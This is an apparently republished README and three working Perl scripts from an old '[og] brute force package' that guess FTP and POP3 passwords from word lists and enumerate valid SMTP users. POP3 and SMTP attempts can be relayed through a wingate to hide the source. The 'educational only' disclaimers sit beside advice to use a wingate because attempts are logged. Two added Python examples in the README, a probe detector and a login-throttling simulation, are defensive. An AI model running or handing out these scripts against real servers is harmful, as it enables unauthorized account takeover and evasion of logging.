[og] brute force package 1.0.1

perl package to brute force pop3 and ftp account passwords and probe smtp for valid logins with wingate support. (In our honest opinion #1)

Published in In our honest opinion · 9 months ago

README

[og] brute force package, version 1.0.1 -- by elicit (benz@slacknet.org)
includes an smtp login probe, and pop3/ftp brute force password guessing
#og @ irc.ndrsnet.com


NOTES:
before you read any further, please understand that THIS IS NOT A HACKING TOOL! this was written for educational *LEGAL* purposes only, and i will not be responsible for what you do with this. now that we have that clear..
this package has pretty much everything needed to retrieve account names from a host and brute force the passwords for them, except word files.
enjoy.


SMTP LOGIN PROBE:
if the smtp server does not send the same message for both valid and invalid users, we can easily tell which accounts exist. this requires a list of login names to attempt (see WORD LISTS below). since most smtp servers will let you keep trying users until a valid one is found, this script allows you to use a wingate.

Syntax:

  ./og-smtp-users.pl <host> <source email> <user list> [wingate]
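
The probe above works only when valid and invalid recipients get different replies, so on the server side it shows up as a burst of unknown-user rejects from one client. The following is an added example, not part of the original package: a log check for that pattern. The function name, thresholds and the Postfix-style log lines are assumptions constructed for illustration.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample input, modelled on Postfix smtpd reject lines (assumption:
# the page names no log format; adapt REJECT to your MTA's wording).
_FMT = ("Mar  3 {t} mx1 postfix/smtpd[811]: NOQUEUE: reject: RCPT from "
        "unknown[{ip}]: 550 5.1.1 <{u}@example.org>: Recipient address rejected: "
        "User unknown in local recipient table; from=<a@example.net> proto=SMTP")
SAMPLE_LOG = "Mar  3 10:00:00 mx1 postfix/smtpd[811]: connect from unknown[192.0.2.10]\n"
SAMPLE_LOG += "\n".join(_FMT.format(t=t, ip=ip, u=u) for t, ip, u in [
    ("10:00:01", "192.0.2.10", "nonexistantuser"),  # control address first
    ("10:00:05", "192.0.2.10", "admin"),
    ("10:00:09", "192.0.2.10", "bob"),
    ("10:00:13", "192.0.2.10", "webmaster"),
    ("10:07:30", "198.51.100.7", "jsmtih"),         # one-off typo, not a probe
    ("11:00:00", "203.0.113.5", "sales"),           # three rejects, hours apart
    ("14:00:00", "203.0.113.5", "info"),
    ("17:00:00", "203.0.113.5", "jobs"),
])

REJECT = re.compile(r"^(\w{3} +\d+ [\d:]+) \S+ postfix/smtpd\[\d+\]: NOQUEUE: reject: "
                    r"RCPT from \S*\[([^\]]+)\]: 550 5\.1\.1 <([^>]*)>: "
                    r"Recipient address rejected: User unknown")

def find_rcpt_probes(log_text, min_unknown=3, window=timedelta(minutes=5)):
    """Return {client_ip: rejected recipients} for clients with at least
    min_unknown distinct unknown-user rejects inside one sliding window."""
    events = defaultdict(list)
    for line in log_text.splitlines():
        m = REJECT.match(line)
        if m:
            # syslog stamps carry no year; a fixed one is enough for deltas
            ts = datetime.strptime("2000 " + m.group(1), "%Y %b %d %H:%M:%S")
            events[m.group(2)].append((ts, m.group(3).lower()))
    flagged = {}
    for ip, hits in events.items():
        hits.sort()
        start = 0
        for end in range(len(hits)):
            while hits[end][0] - hits[start][0] > window:
                start += 1
            if len({rcpt for _, rcpt in hits[start:end + 1]}) >= min_unknown:
                flagged[ip] = sorted({rcpt for _, rcpt in hits})
                break
    return flagged
```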

POP3 BRUTE FORCE:
this script assumes that the pop3 server allows you to make infinite authentication attempts, and it will not work any other way. this simply attempts the passwords in your word list for a specific user until it finds the correct one or runs out of words. this script also allows you to use a wingate.

Syntax:

  ./og-pop3 <host> <user> <word file> [wingate]

FTP BRUTE FORCE:
this script is significantly slower than pop3 because almost all ftp servers disconnect you after a few authentication attempts. if the number of authentication attempts is not specified from the command line, it will default to 2 per connection. since so many connections need to be made, i didn't include a wingate option.

Syntax:

  ./og-ftp <host> <user> <word file> [attempts per connect (2)]
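
The POP3 and FTP sections above depend on two server behaviours: unlimited attempts on one connection, and a per-connection cap that resets on reconnect. The following is an added example, not part of the original package: a failed-login policy that covers both, replayed against the reconnect pattern the FTP section describes. Class, function and parameter names are hypothetical, and the account name and timings are constructed.

```python
from collections import defaultdict, deque

class AuthThrottle:
    """Verdict for a POP3/FTP daemon after each failed login.

    per_conn: failures allowed on one connection before it is closed.
    per_key/window: failures allowed per account across all connections
    within `window` seconds before further attempts are refused. Keyed on the
    account, not the source address, since a relay changes the source.
    """
    def __init__(self, per_conn=3, per_key=6, window=600):
        self.per_conn, self.per_key, self.window = per_conn, per_key, window
        self.conn_fail = defaultdict(int)
        self.key_fail = defaultdict(deque)

    def on_failure(self, conn_id, account, now):
        self.conn_fail[conn_id] += 1
        recent = self.key_fail[account]
        recent.append(now)
        while now - recent[0] > self.window:   # drop failures outside the window
            recent.popleft()
        if len(recent) >= self.per_key:
            return "lockout"
        if self.conn_fail[conn_id] >= self.per_conn:
            del self.conn_fail[conn_id]        # connection is being closed
            return "disconnect"
        return "retry"

def guesses_evaluated(throttle, total, per_connect, gap=6):
    """Replay `total` wrong passwords for one account, `per_connect` per
    connection, `gap` seconds apart; return how many the server evaluated
    before the policy answered "lockout" (or `total` if it never did)."""
    conn_id, on_conn = 0, 0
    for i in range(total):
        verdict = throttle.on_failure(conn_id, "alice", now=i * gap)
        on_conn += 1
        if verdict == "lockout":
            return i + 1
        if verdict == "disconnect" or on_conn == per_connect:
            conn_id, on_conn = conn_id + 1, 0  # client opens a new connection
    return total

# A per-connection cap alone never triggers at 2 attempts per connection;
# adding the per-account window stops the run at the sixth failure.
conn_cap_only = guesses_evaluated(AuthThrottle(per_conn=3, per_key=10**9), 1000, 2)
with_account_window = guesses_evaluated(AuthThrottle(per_conn=3, per_key=6), 1000, 2)
```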

WORD LISTS:
the only site i know with word lists is packetstorm: http://packetstorm.securify.com/Crackers/wordlists


THANKS:
#og @ irc.ndrsnet.com, everyone involved in making IOHO, ice-e, heeb, seraph, halcy0n, ka0z, ben-z, BosniaGod (wrLiner), robosok, and vexation

og-ftp.pl

#!/usr/bin/perl 
#
# [og] og-ftp.pl, attempts to brute force ftp accounts
# -- elicit (benz@slacknet.org)
#
# NOTES:
# after i wrote og-pop3.pl, robosok gave me the idea to write similar
# scripts for ftp and telnet. although this will take a whole lot longer
# than pop3, some machines only run ftp. i didnt add wingate support to
# this because that would just be ridiculous; maybe later. THIS IS FOR
# EDUCATIONAL *LEGAL* PURPOSES ONLY. elicit is not responsible for what
# you do with this.
#
#
# THANKS:
# this should be with the og-brute package, so read og-pop3.pl
#
# ** THIS WILL BE HEAVILY LOGGED **


use Socket;
$ARGC=@ARGV;

system clear;
print "[og] ftp account brute force.. -by elicit- #og \@ irc.ndrsnet.com [og]\n\n";

if ($ARGC <3) {
print "[og] usage, $0 <host> <user> <word file> [attempts per connect (2)]\n\n";
exit;
}

$target=$ARGV[0];
$ruser=$ARGV[1];
$wfile=$ARGV[2];
$attempts="2";
if ($ARGV[3]) {
$attempts=$ARGV[3];
}
$cnt="0";
$num="0";
$port="21";

open(wordz1,"$wfile") or die "\n[og] word file does not exist.\n";
while(<wordz1>) {
$cnt++;
}
close(wordz1);
$isleep=($cnt / $attempts);
$eta=(($cnt * 6) + $isleep) / 60;

print "[og] $target: trying $cnt passwords for user $ruser..\n";
print "[og] $target: estimated max session time is $eta minutes.\n\n";

open(wordz2,"$wfile");
$iaddr=inet_aton($target) or die "[og] unable to resolve host.\n";
$paddr=sockaddr_in($port,$iaddr) or die "\n[og] unable to resolve host.\n";
$proto=getprotobyname('tcp') or die "\n[og] dude, your box sucks.\n";

$done="0";
$muser="USER $ruser\n";
$rquit="quit\n";

while ($done != 1) {
$acnt="0";
socket(sok,PF_INET,SOCK_STREAM,$proto) or die "\n[og] connection refused.\n";
connect(sok,$paddr) or die "\n[og] connection refused.\n";
sleep(6);
while ($acnt < $attempts) {
send(sok,$muser,0) or die "\n[og] connection lost. try using less attempts per connect.\n";
sleep(2);
$num++;
$rpass=<wordz2>;
chomp $rpass;
$mpass="PASS $rpass\n";
send(sok,$mpass,0) or die "\n[og] connection lost. try using less attempts per connect.\n";
sleep (4);
$msg='';
recv(sok,$msg,1024,0) or die "\n[og] error reading from socket!.\n";
print "$mpass$msg";
if(index($msg,"logged in") >= 0) {
print "\n\n[og] PASSWORD FOUND! login: $ruser, pass: $rpass\n";
$done="1";
exit;
}
send(sok,$rquit,0);
if(!$rpass) {
$done="1";
}
$acnt++;
}
}

print "\n\n[og] Sorry, no passwords matched for user $ruser. =<\n";
exit;

og-pop3.pl

#!/usr/bin/perl 
#
# [og] og-pop3.pl, attempts to brute force pop3 accounts using optional
# wingate support. made out of pure boredom by elicit (benz@slacknet.org)
#
# NOTES:
# the only perl pop3 brute force script i could find is in spanish,
# and i really want some of whatever they smoked before writing it.
# this one was tested under slackware 7.0, and works fine and dandy.
# of course, this is for educational _LEGAL_ purposes only, although
# i cant really think of any way you would want to use it legally =/
# I am not responsible for your use of this. oh yeah this is designed
# for pop3 daemons that allow infinite authentication attempts, and it
# will take a damn long time obviously.
#
# ** THIS WILL BE HEAVILY LOGGED! USE A WINGATE **
#
# p.s. i couldnt find a wingate to test this on, but it should work =>

use Socket;
$ARGC=@ARGV;

system clear;
print "[og] pop3 account brute force.. -by elicit- #og \@ irc.ndrsnet.com [og]\n\n";

if ($ARGC <3) {
print "[og] usage, $0 <host> <user> <word file> [wingate]\n\n";
exit;
}
if ($ARGV[3]) {
$wingate=$ARGV[3];
}

$target=$ARGV[0];
$ruser=$ARGV[1];
$wfile=$ARGV[2];
$cnt="0";
$num="0";
$port="110";
$gport="23";

open(wordz1,"$wfile") or die "\n[og] word file does not exist.\n";
while(<wordz1>) {
$cnt++;
}
close(wordz1);
$eta=($cnt * 6) / 60;

print "[og] $target: trying $cnt passwords for user $ruser..\n";
print "[og] $target: estimated max session time is $eta minutes.\n\n";

open(wordz2,"$wfile");
if ($wingate) {
$iaddr=inet_aton($wingate) or die "[og] unable to resolve wingate.\n";
$paddr=sockaddr_in($gport,$iaddr) or die "[og] unable to resolve wingate.\n";
$proto=getprotobyname('tcp') or die "\n[og] dude, your box sucks.\n";
socket(sok,PF_INET,SOCK_STREAM,$proto) or die "\n[og] wingate connection refused.\n";
connect(sok,$paddr) or die "\n[og] wingate connection refused.\n";
$mesg="$target 110";
send(sok,$mesg,0) or die "\n[og] this wingate sucks. try a different one.\n";
sleep(7);
}
if (!$wingate) {
$iaddr=inet_aton($target) or die "[og] unable to resolve host.\n";
$paddr=sockaddr_in($port,$iaddr) or die "\n[og] unable to resolve host.\n";
$proto=getprotobyname('tcp') or die "\n[og] dude, your box sucks.\n";
socket(sok,PF_INET,SOCK_STREAM,$proto) or die "\n[og] connection refused.\n";
connect(sok,$paddr) or die "\n[og] connection refused.\n";
sleep(5);
}
$done="0";
$muser="USER $ruser\n";

while ($done != 1) {
sleep(6);
send(sok,$muser,0) or die "\n[og] this server doesnt allow infinite auth attempts =P\n";
$num++;
$rpass=<wordz2>;
chomp $rpass;
$mpass="PASS $rpass\n";
send(sok,$mpass,0) or die "\n[og] this server doesnt allow infinite auth attempts =P\n";
$msg='';
recv(sok,$msg,1024,0) or die "\n[og] error reading from socket!.\n";
print "$mpass$msg";
if(index($msg,"messages") >= 0) {
print "\n\n[og] PASSWORD FOUND! login: $ruser, pass: $rpass\n";
$done="1";
exit;
}
if(!$rpass) {
$done="1";
}
}

print "\n\n[og] Sorry, no passwords matched for user $ruser. =<\n";
exit;

og-smtp-users.pl

#!/usr/bin/perl 
#
# [og] og-smtp-users.pl, attempts to probe valid login names from sendmail
# -- elicit (benz@slacknet.org)
#
# NOTES:
# obviously, you cant start brute forcing account passwords without a valid
# login on the box. this works by repeatedly trying to get an email message
# accepted to a user, and it logs every single attempt to the syslog so
# dont use this to hack! THIS IS FOR EDUCATIONAL *LEGAL* PURPOSES ONLY.
#


use Socket;
$ARGC=@ARGV;

system clear;
print "[og] smtp login probe.. -by elicit- #og \@ irc.ndrsnet.com [og]\n\n";

if ($ARGC <3) {
print "[og] usage, $0 <host> <source email> <user list> [wingate]\n\n";
exit;
}
if ($ARGV[3]) {
$wingate=$ARGV[3];
}

$target=$ARGV[0];
$ruser=$ARGV[1];
$wfile=$ARGV[2];
$cnt="0";
$num="0";
$port="25";
$gport="23";

open(wordz1,"$wfile") or die "\n[og] user list does not exist.\n";
while(<wordz1>) {
$cnt++;
}
close(wordz1);
$eta=($cnt * 4) / 60;

print "[og] $target: attempting $cnt possible logins..\n";
print "[og] $target: estimated max session time is $eta minutes.\n\n";

open(wordz2,"$wfile");
if ($wingate) {
$iaddr=inet_aton($wingate) or die "[og] unable to resolve wingate.\n";
$paddr=sockaddr_in($gport,$iaddr) or die "[og] unable to resolve wingate.\n";
$proto=getprotobyname('tcp') or die "\n[og] dude, your box sucks.\n";
socket(sok,PF_INET,SOCK_STREAM,$proto) or die "\n[og] wingate connection refused.\n";
connect(sok,$paddr) or die "\n[og] wingate connection refused.\n";
$mesg="$target 25";
send(sok,$mesg,0) or die "\n[og] this wingate sucks. try a different one.\n";
sleep(7);
}
if (!$wingate) {
$iaddr=inet_aton($target) or die "[og] unable to resolve host.\n";
$paddr=sockaddr_in($port,$iaddr) or die "\n[og] unable to resolve host.\n";
$proto=getprotobyname('tcp') or die "\n[og] dude, your box sucks.\n";
socket(sok,PF_INET,SOCK_STREAM,$proto) or die "\n[og] connection refused.\n";
connect(sok,$paddr) or die "\n[og] connection refused.\n";
sleep(5);
}
$done="0";
$helo="HELO cybercrime.gov\n";
$muser="MAIL FROM: $ruser\n";
send(sok,$helo,0) or die "\[og] unable to write to socket.\n";
sleep(2);
send(sok,$muser,0) or die "\[og] smtp didnt like our HELO request.\n";
sleep(2);
recv(sok,$msg,1024,0) or die "\[og] cant read from server.\n";
$msg='';
$rpass="RCPT TO: nonexistantuser\n";
send(sok,$rpass,0) or die "\n[og] smtp did not accept your source email address.\n";
sleep(4);
recv(sok,$msg,1024,0) or die "\n[og] this smtp server does not allow user probing.\n";
if(index($msg,"ok") >= 0) {
print "\n[og] this smtp server does not allow user probing.\n";
exit;
}
$valid="0";
while ($done != 1) {
if ($valid > 0) {
$rquit="quit\n";
send(sok,$rquit,0);
sleep(1);
socket(sok,PF_INET,SOCK_STREAM,$proto) or die "\n[og] connection refused.\n";
connect(sok,$paddr) or die "\n[og] connection refused.\n";
sleep(5);
send(sok,$helo,0) or die "\[og] unable to write to socket.\n";
sleep(2);
send(sok,$muser,0) or die "\[og] smtp didnt like our HELO request.\n";
sleep(2);
$rpass="RCPT TO: nonexistantuser\n";
send(sok,$rpass,0) or die "\n[og] smtp did not accept your source email address.\n";
sleep(2);
}
$num++;
$valid="0";
$rpass=<wordz2>;
chomp $rpass;
$mpass="RCPT TO: $rpass\n";
send(sok,$mpass,0) or die "\n[og] cant probe multiple users from this server =P\n";
$msg='';
recv(sok,$msg,1024,0) or die "\n[og] error reading from socket!.\n";
if(index($msg,"ok") >= 0) {
print "[og] VALID LOGIN FOUND! $target, user: $rpass\n";
$valid="1";
}
if(!$rpass) {
$done="1";
}
}

print "\n\n[og] sorry, none of the accounts in $wfile existed. =<\n";
exit;
